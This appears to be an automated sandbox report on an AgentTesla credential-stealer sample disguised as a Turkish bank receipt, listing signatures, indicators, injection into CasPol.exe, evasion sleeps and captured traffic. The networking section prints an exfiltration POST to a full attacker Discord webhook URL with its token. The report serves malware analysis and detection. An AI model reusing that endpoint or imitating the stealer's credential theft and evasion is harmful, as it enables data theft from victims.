
Windows Analysis Report
e-dekont-20230206.exe

Overview

General Information

Sample Name: e-dekont-20230206.exe
Analysis ID: 800718
MD5: 33a5f92deee382035467caff29a8d487
SHA1: 7e6daec4a2a4dde0f5148df4165fa8cebb7011e4
SHA256: e3b4406836308220da7989e5d539486ee1b71b4cc25a822e056993ab44675666
Tags: exegeoTUR

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • e-dekont-20230206.exe (PID: 5124 cmdline: C:\Users\user\Desktop\e-dekont-20230206.exe MD5: 33A5F92DEEE382035467CAFF29A8D487)
    • CasPol.exe (PID: 2256 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
  • cleanup
No configs have been found
Yara matches (Source | Rule | Description | Author | Strings):
00000001.00000002.558103667.00000000033DC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: CasPol.exe PID: 2256 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: CasPol.exe PID: 2256 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
No Sigma rule has matched
Snort alert:
        Timestamp: 02/07/23-18:41:32.301093
        Source IP: 192.168.2.5
        Destination IP: 162.159.135.232
        Source Port: 49703
        Destination Port: 443
        SID: 2851779
        Protocol: TCP
        Classtype: A Network Trojan was detected


        AV Detection

        Source: e-dekont-20230206.exe | ReversingLabs: Detection: 41%
        Source: e-dekont-20230206.exe | Virustotal: Detection: 55%
        Source: e-dekont-20230206.exe | Joe Sandbox ML: detected
        Source: unknown | HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:49702 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.5:49703 version: TLS 1.2
        Source: e-dekont-20230206.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: FUCKYOU.pdb | source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmp, e-dekont-20230206.exe, 00000000.00000002.296374336.0000022E8DC30000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: FUCKYOU.pdbxc | source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmp, e-dekont-20230206.exe, 00000000.00000002.296374336.0000022E8DC30000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: NNbHhH.pdb | source: e-dekont-20230206.exe
        Source: Binary string: NNbHhH.pdbH | source: e-dekont-20230206.exe

        Networking

        Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49703 -> 162.159.135.232:443
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | DNS query: name: api.ipify.org (6 identical entries)
        Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Joe Sandbox View | IP Address: 64.185.227.155 64.185.227.155 (2 identical entries)
        Source: global traffic | HTTP traffic detected:
            GET / HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
            Host: api.ipify.org
            Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected:
            POST /api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr HTTP/1.1
            Content-Type: multipart/form-data; boundary=----------42b446e635b543ad97de25b01e6979b4
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
            Host: discord.com
            Content-Length: 1224
            Expect: 100-continue
            Connection: Keep-Alive
        Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
        Source: global traffic | HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Date: Tue, 07 Feb 2023 17:41:32 GMT
            Content-Type: application/json
            Content-Length: 45
            Connection: close
            set-cookie: __dcfduid=a8ea0446a70e11ed8d802657744d3ae7; Expires=Sun, 06-Feb-2028 17:41:32 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
            strict-transport-security: max-age=31536000; includeSubDomains; preload
            Via: 1.1 google
            Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Bty7akNoWX6OC4aoE2iHe7LxHQHtrn188ZjWicZIiSBh1heuF9zsXpH9biouDi8l7hbBetRLrMi7Ya7Ieov%2FahcmIdQSLBEYWkkXiRzLyJCYMmwGMyfI%2B0e3oFmC"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            X-Content-Type-Options: nosniff
            Set-Cookie: __sdcfduid=a8ea0446a70e11ed8d802657744d3ae7c23a0232fc8c5f932fd4f6c1c91175609cee1f861eccdf03b6a96c0a50384823; Expires=Sun, 06-Feb-2028 17:41:32 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
            Set-Cookie: __cfruid=7623650af91c9a0c1d05a6a7bc2a77b0906cb4ae-1675791692; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
            Server: cloudflare
            CF-RAY: 795deabcc9628fdd-FRA

            {"message": "Unknown Webhook", "code": 10015}
        Source: CasPol.exe, 00000001.00000002.560208417.0000000006262000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: CasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://discord.com
        Source: CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
        Source: CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
        Source: CasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com
        Source: CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31
        Source: CasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com4Dp
        Source: unknown | HTTP traffic detected:
            POST /api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr HTTP/1.1
            Content-Type: multipart/form-data; boundary=----------42b446e635b543ad97de25b01e6979b4
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
            Host: discord.com
            Content-Length: 1224
            Expect: 100-continue
            Connection: Keep-Alive
        Source: unknown | DNS traffic detected: queries for: api.ipify.org
        Source: global traffic | HTTP traffic detected:
            GET / HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
            Host: api.ipify.org
            Connection: Keep-Alive
        Source: unknown | HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:49702 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.5:49703 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06B90290 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,06B92078,00000000,00000000
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Window created: window name: CLIPBRDWNDCLASS
        Source: C:\Users\user\Desktop\e-dekont-20230206.exe | Code function: 0_2_00007FF9A5D90764
        Source: C:\Users\user\Desktop\e-dekont-20230206.exe | Code function: 0_2_00007FF9A5D96CAD
        Source: C:\Users\user\Desktop\e-dekont-20230206.exe | Code function: 0_2_00007FF9A5D90816
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_05A3C5B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_05A317A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_05A31772
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_05A301A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_05A39328
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06B90D20
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06B99DF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06F442D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06F4E088
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06F4B178
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06F47C08
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06F48BC0
        Source: e-dekont-20230206.exe | Static PE information: No import functions for PE file found
        Source: e-dekont-20230206.exe, 00000000.00000000.291653847.0000022E8D92C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameNNbHhH.exe. vs e-dekont-20230206.exe
        Source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameFUCKYOU.dll0 vs e-dekont-20230206.exe
        Source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamec4a5f7b8-6b1b-4e41-a389-a4734cc6954b.exe4 vs e-dekont-20230206.exe
        Source: e-dekont-20230206.exe, 00000000.00000002.296795377.0000022E9F6E9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamec4a5f7b8-6b1b-4e41-a389-a4734cc6954b.exe4 vs e-dekont-20230206.exe
        Source: e-dekont-20230206.exe, 00000000.00000002.296374336.0000022E8DC30000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameFUCKYOU.dll0 vs e-dekont-20230206.exe
        Source: e-dekont-20230206.exe, 00000000.00000002.295935631.0000022E8D9D9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs e-dekont-20230206.exe
        Source: e-dekont-20230206.exe | Binary or memory string: OriginalFilenameNNbHhH.exe. vs e-dekont-20230206.exe
        Source: e-dekont-20230206.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: e-dekont-20230206.exe | ReversingLabs: Detection: 41%
        Source: e-dekont-20230206.exe | Virustotal: Detection: 55%
        Source: e-dekont-20230206.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\e-dekont-20230206.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknown | Process created: C:\Users\user\Desktop\e-dekont-20230206.exe C:\Users\user\Desktop\e-dekont-20230206.exe
        Source: C:\Users\user\Desktop\e-dekont-20230206.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe (2 identical entries)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor (2 identical entries)
        Source: C:\Users\user\Desktop\e-dekont-20230206.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\e-dekont-20230206.exe.log
        Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/1@3/2
        Source: e-dekont-20230206.exe | Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 47.53%
        Source: C:\Users\user\Desktop\e-dekont-20230206.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: e-dekont-20230206.exe, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs | Cryptographic APIs: 'CreateDecryptor' (3 identical entries)
        Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs | Cryptographic APIs: 'CreateDecryptor' (3 identical entries)
        Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs | Cryptographic APIs: 'CreateDecryptor' (3 identical entries)
        Source: 1.2.CasPol.exe.400000.0.unpack, A/N1.cs | Cryptographic APIs: 'TransformFinalBlock'
        Source: 1.2.CasPol.exe.400000.0.unpack, A/N1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor' (3 identical entries)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File read: C:\Windows\System32\drivers\etc\hosts (4 identical entries)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: e-dekont-20230206.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: e-dekont-20230206.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: e-dekont-20230206.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: FUCKYOU.pdb | source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmp, e-dekont-20230206.exe, 00000000.00000002.296374336.0000022E8DC30000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: FUCKYOU.pdbxc | source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmp, e-dekont-20230206.exe, 00000000.00000002.296374336.0000022E8DC30000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: NNbHhH.pdb | source: e-dekont-20230206.exe
        Source: Binary string: NNbHhH.pdbH | source: e-dekont-20230206.exe

        Data Obfuscation

        Source: e-dekont-20230206.exe, SdRVZOuA41VO3Qkhg8/Hbk6J2G275BdoJl0CG.cs | .Net Code: xxNjTM0rD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, SdRVZOuA41VO3Qkhg8/Hbk6J2G275BdoJl0CG.cs | .Net Code: xxNjTM0rD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, SdRVZOuA41VO3Qkhg8/Hbk6J2G275BdoJl0CG.cs | .Net Code: xxNjTM0rD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: e-dekont-20230206.exe, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs | .Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
        Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs | .Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
        Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs | .Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
        Source: C:\Users\user\Desktop\e-dekont-20230206.exe | Code function: 0_2_00007FF9A5D9826D push edi; retf
        Source: C:\Users\user\Desktop\e-dekont-20230206.exe | Code function: 0_2_00007FF9A5D9821E push edi; retf
        Source: C:\Users\user\Desktop\e-dekont-20230206.exe | Code function: 0_2_00007FF9A5D9890E push eax; retf
        Source: C:\Users\user\Desktop\e-dekont-20230206.exe | Code function: 0_2_00007FF9A5D9841A push ebp; retf
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_05A37C9A push eax; retf
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_05A37499 push FFFFFF8Bh; iretd
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_05A37CE0 pushfd ; retf
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_05A38424 push esp; iretd
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_05A337B7 pushad ; iretd
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_05A37E40 push 6C66h; ret
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 1_2_06B9CF26 push es; retf
        Source: e-dekont-20230206.exe | Static PE information: 0xEC8B859F [Tue Oct 4 11:38:07 2095 UTC]
        Source: initial sample | Static PE information: section name: .text entropy: 7.97077131969678
        Source: e-dekont-20230206.exe, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs | High entropy of concatenated method names: '.cctor', 'DoLrRC2aiV2ty', 'jKwJEdlLh', 'nIjkqkxau', 'l3W9dARdo', 'UOsUD22g2', 'ccEEpyD4X', 'YloYafFam', 'WksgiyQF0', 'WHFyDtbvA'
        Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs | High entropy of concatenated method names: '.cctor', 'DoLrRC2aiV2ty', 'jKwJEdlLh', 'nIjkqkxau', 'l3W9dARdo', 'UOsUD22g2', 'ccEEpyD4X', 'YloYafFam', 'WksgiyQF0', 'WHFyDtbvA'
        Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs | High entropy of concatenated method names: '.cctor', 'DoLrRC2aiV2ty', 'jKwJEdlLh', 'nIjkqkxau', 'l3W9dARdo', 'UOsUD22g2', 'ccEEpyD4X', 'YloYafFam', 'WksgiyQF0', 'WHFyDtbvA'
        Source: C:\Users\user\Desktop\e-dekont-20230206.exe | Process information set: NOOPENFILEERRORBOX (10 identical entries)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process information set: NOOPENFILEERRORBOX (60 identical entries)

        Malware Analysis System Evasion

        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
        Source: C:\Users\user\Desktop\e-dekont-20230206.exe TID: 2216 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5604 | Thread sleep count: 9564 > 30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 | Thread sleep time: -18446744073709540s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 | Thread sleep time: -1200000s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 | Thread sleep time: -1199781s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 | Thread sleep time: -1199641s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 | Thread sleep time: -1199422s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 | Thread sleep time: -1199297s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 | Thread sleep time: -1199167s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 | Thread sleep time: -1199015s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 | Thread sleep time: -1198906s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 | Thread sleep time: -1198797s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 | Thread sleep time: -1198641s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 | Thread sleep time: -1198531s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 | Thread sleep time: -1198404s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 | Thread sleep time: -1198279s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 | Thread sleep time: -1198171s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 | Thread sleep time: -1198041s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 | Thread sleep time: -1197921s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584 | Thread sleep time: -1197813s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1197641s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1197496s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1197390s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1197264s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1197156s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1197031s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1196922s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1196813s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1196641s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1196510s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1196406s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1196288s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1196171s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1196063s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195953s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195844s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195703s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195593s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195484s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195374s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195265s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195155s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195042s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1194922s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1194812s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1194703s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1194593s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1194483s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1194375s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1194263s >= -30000s
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1200000
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199781
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199641
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199422
